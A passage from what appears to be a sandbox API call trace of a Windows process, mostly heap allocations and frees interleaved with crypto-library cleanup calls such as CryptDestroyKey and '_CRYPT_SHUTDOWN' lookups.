CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0265.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.873] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0265.873] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0265.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51af0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0265.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.874] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0265.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0265.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0265.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.874] CryptDestroyKey (hKey=0xa87110) returned 1 [0265.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0265.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0265.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0265.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0265.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0265.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0265.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0265.876] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0265.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0265.876] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0265.876] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0265.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0265.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518c8 [0265.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0265.877] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0265.877] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0265.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0265.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0265.877] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0265.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0265.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0265.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0265.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0265.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0265.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0265.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0265.878] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0265.878] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0265.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0265.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.878] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0265.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0265.878] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0265.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0265.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0265.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0265.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0265.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0265.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0265.879] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0265.879] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0265.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0265.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0265.879] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0265.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0265.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0265.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0265.879] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0265.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0265.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0265.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0265.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0265.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0265.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0265.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0265.881] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0265.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0265.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0265.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0265.881] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0265.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0265.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0265.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0265.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0265.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515f8 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0265.882] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.882] HeapFree (in: hHeap=0x970000, 